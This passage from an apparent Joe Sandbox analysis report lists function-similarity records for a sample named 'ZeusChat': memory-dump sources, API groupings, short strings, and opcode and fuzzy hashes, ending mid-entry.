• Instruction Fuzzy Hash: AA313736A096818BE3B09F25F894B1AB761EB88790F549139DA9D03F58CF7CD849CB10
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
• Instruction ID: 99f3287d31c6a20bfd1baf47dbac48077288fef39ab6f6e0910ed262ffc6ad28
• Opcode Fuzzy Hash: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
• Instruction Fuzzy Hash: AA21B37670AB4182EB64DB22E844B2AA7A0FB89FC8F484035DE4D43B54DF7CE809C710
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
• Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
• Instruction ID: d17367d05d2447e8da687726d0284c0ee5199ba91936be140e341d356066ca52
• Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
• Instruction Fuzzy Hash: F1A1166AA1A24385F724AF7588447BDB3A0FF04B18F981035DE1E47E94EB7C9809D334
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Process$CurrentInfoSystemVersionWow64
• String ID:
• API String ID: 1568231622-0
• Opcode ID: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
• Instruction ID: e474062a763f8bc2a02511d6703abe9e0a7d0309976d8abb0073672f7b049c41
• Opcode Fuzzy Hash: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
• Instruction Fuzzy Hash: C2C161A5E8E6C2C6F661EB10AC80276BB51AF11784FCC4035D88D426A9DEECB54EC771
APIs
• #8.OLEAUT32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B329
• #9.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3AE
• #10.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3BA
• #9.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3C5
• #2.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3F5
• #10.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B457
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
• Instruction ID: e4e7711234b01739a65ed808bdea0f780e5be353685c24d8053dc02a197ad51e
• Opcode Fuzzy Hash: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
• Instruction Fuzzy Hash: 54716371B0A38282EA24BF2599941BCE7A1EF45780F8C4136D74D17B91DFADF918C328
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID:
• String ID: %.15g$0x%p$False$True
• API String ID: 0-2263619337
• Opcode ID: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
• Instruction ID: caa775ebb9da4d965c255803aa3a1b509898dbdb0be117f9fb3c0e73395e80f7
• Opcode Fuzzy Hash: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
• Instruction Fuzzy Hash: 7F51C432F0BA1685EF10EB64D8841BDB365EB84B84F988132DA4D47795DE79D40AC3A0
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
• Opcode ID: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
• Instruction ID: 8d26c780d101518a3d4e7db83a43a7769f2435bd87add6494c95a30c10208227
• Opcode Fuzzy Hash: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
• Instruction Fuzzy Hash: 2E51D132A1A78286EB20EB15D884779B7A1FB45B94F884235CA5C07B94DFBDE509C710
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
• String ID:
• API String ID: 450394209-0
• Opcode ID: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
• Instruction ID: 4fc5a94cdaca82756273a7de3c7775f81d04a6e2feb967a0b4332f531320540b
• Opcode Fuzzy Hash: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
• Instruction Fuzzy Hash: CA117272B1968287E764AB16EC4032AA3A1AB85BC4F9C4031DB4D4BB58DF7DE848C710
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
• String ID:
• API String ID: 2082702847-0
• Opcode ID: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
• Instruction ID: 0e0ed5787f968ad0db935098783d2d311dc405f5bb420042b950771aff2a2ebd
• Opcode Fuzzy Hash: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
• Instruction Fuzzy Hash: 96218425A0FB0A81EE65BB60AE04279E290AF69774F8C0734D93D067D4DFBCD40CC220
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDevice$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 1035833867-0
                                                                                                      • Opcode ID: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction ID: 11bfe114999343c987690acb926a83b8f0ba062f3795e663f7c3230b5e680dfc
                                                                                                      • Opcode Fuzzy Hash: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction Fuzzy Hash: CD11A335706B4186EB58EF61985412DABA1FB48FC0F888478CE0E47B94CE7DD849C710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 43455801-0
                                                                                                      • Opcode ID: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction ID: 4edf4925395aa78656ea3eb209dfe7447cdc2e67ee9ee50b372b930528200913
                                                                                                      • Opcode Fuzzy Hash: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction Fuzzy Hash: 9C11BF31B5529282E724AB15BC04B6DAB60EB85B84F8C4530CF1A03B54CFBEE859CB40
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4278518827-0
                                                                                                      • Opcode ID: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction ID: af5df0f92bf66be52bba348d4072b57e77fb9f26c950fbcf9d329332831b5914
                                                                                                      • Opcode Fuzzy Hash: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction Fuzzy Hash: 9211C232916640CAD359DF39CC8821D7BB2FB58B08F888574C20D87261DF38C49EC715
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: #$E$O
                                                                                                      • API String ID: 3215553584-248080428
                                                                                                      • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction ID: 305fbb7db4e59feadef4977b90a07aed6d6fcc40e08c86e94126b4726c79482d
                                                                                                      • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction Fuzzy Hash: E9419426A1EB5986EF51AF259E801ADA3B0BF64788F8C4131EE4D07759DF7CD449C320
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                      • API String ID: 3135491444-4094128768
                                                                                                      • Opcode ID: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction ID: b0c046023c103ed91bbfbe1cee330a8f129620314dbc5845850ba12e81e26a08
                                                                                                      • Opcode Fuzzy Hash: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction Fuzzy Hash: 39413762A0E64696F710FB20EC811BAA762FB95344FC84131E58D4759ADFBCE50DC760
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                      • String ID: SysAnimate32
                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                      • Opcode ID: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction ID: 41f934e916b54c7b991c4434491e4e78ff3c585a4c5833e3a4e3caf82274a1e2
                                                                                                      • Opcode Fuzzy Hash: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction Fuzzy Hash: 3C31823270A781CAEBA0AF24E84076E77A1FB85790F984135DA5D07B94DF7CD885CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction ID: 8ba41b042257834758d83d0293e83c374a58fff12d732ea26b3d488a6a96c8e7
                                                                                                      • Opcode Fuzzy Hash: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction Fuzzy Hash: 00F04421A1AA4A81EF55AB11F8C037DA7A0EF88B90FDC1035E94F46754DEBDD84CC710
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction ID: 5c52e777c99b47f0d045cd6b0f7e962a7a2fc01cb6c6a4170cca3231f9ef8519
                                                                                                      • Opcode Fuzzy Hash: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction Fuzzy Hash: D2A1E862F0A78249FB716B519C14379E6A1AF407A4F8C8A35DA6D077C5DFBCE448C3A0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                      • Instruction ID: 36951d74597951752eba2dba35507875c36fdb033853832a9363435cec23840d
                                                                                                      • Opcode Fuzzy Hash: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
• Instruction Fuzzy Hash: 2381D522E1E60A85F721BB259E406FDA6A0BF64744F884235DE0E576D5CFBCE44AC730
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
• Opcode ID: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
• Instruction ID: 691e6082a2882fe6550bbe554fdbe11e8521ca4468ce75ae40d6d7885fa53567
• Opcode Fuzzy Hash: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
• Instruction Fuzzy Hash: E9512432A19A5585E710DF25DD443ACBBB0FB54B88F488235DE4E47B99DF78D049C710
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
• Instruction ID: 969abf2b0721cb1c6bdfaa9a263aa1d78a9cf4e42469f13181bd3c86988bdfb6
• Opcode Fuzzy Hash: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
• Instruction Fuzzy Hash: 6C519432F0A78289E660AF129840179F7A4EF54BA0F9D9235DAAD076D4DEBCD845C360
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
• Instruction ID: 5166b353d92800051057232101e6cae638571dd4d4e32477a92a8afee8e2539c
• Opcode Fuzzy Hash: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
• Instruction Fuzzy Hash: 7751E132B0A6828BE758EF328980569F760FB45794F984231EA6D43BD5CF78E455C720
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
• Instruction ID: 5f20743c004955ebca5917261a36e8ae463f8a14ba6340cc4516089c98a6f088
• Opcode Fuzzy Hash: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
• Instruction Fuzzy Hash: 4E41E522B0FA4A91FA11BF06AD04275E391BF68B94F8D4536DD5D4B394DEBCE448C320
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Window$Show$Enable
• String ID:
• API String ID: 2939132127-0
• Opcode ID: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
• Instruction ID: 1e67683419e0fe8f333f74ee1a082714e3aeab7865df4a5b021a10dfb2b33e24
